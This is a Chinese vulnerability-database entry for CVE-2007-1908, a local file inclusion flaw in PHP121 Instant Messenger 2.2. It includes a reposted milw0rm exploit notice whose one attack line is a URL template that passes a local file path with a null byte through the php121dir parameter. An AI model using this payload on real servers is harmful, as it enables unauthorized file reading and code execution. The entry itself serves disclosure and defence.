PHP121 Instant Messenger 'php121db.PHP' 本地文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112661 漏洞类型 输入验证
发布时间 2007-04-09 更新时间 2007-04-11
CVE编号 CVE-2007-1908 CNNVD-ID CNNVD-200704-175
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3694
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-175
|漏洞详情
PHP121InstantMessenger的php121db.php中存在PHP文件包含漏洞。远程攻击者可以借助php121dir参数中的一个UNC共享路径名或本地文件路径名,执行任意的PHP代码。该参数会被file_exists函数访问。
|漏洞EXP
+========================I=R=A=N============================+

                                             PHP121 Version 2.2 

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Author :

                         Dj7xpl / Dj7xpl[at]Yahoo[dot]com

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Type :

                         Local File Inclusion Vulnerability 

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Download :

                         http://www.php121.com/download.php

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Bug :

                         http://[Target]/[Path]/php121db.php?php121dir=[ Local File ]%00

                         =========================I=R=A=N=============================

# milw0rm.com [2007-04-09]
|参考资料

来源:MILW0RM
名称:3694
链接:http://www.milw0rm.com/exploits/3694
来源:OSVDB
名称:34720
链接:http://osvdb.org/34720
来源:XF
名称:php121-php121db-file-include(33525)
链接:http://xforce.iss.net/xforce/xfdb/33525
来源:BID
名称:23392
链接:http://www.securityfocus.com/bid/23392
来源:VUPEN
名称:ADV-2007-1314
链接:http://www.frsirt.com/english/advisories/2007/1314
来源:SECUNIA
名称:24818
链接:http://secunia.com/advisories/24818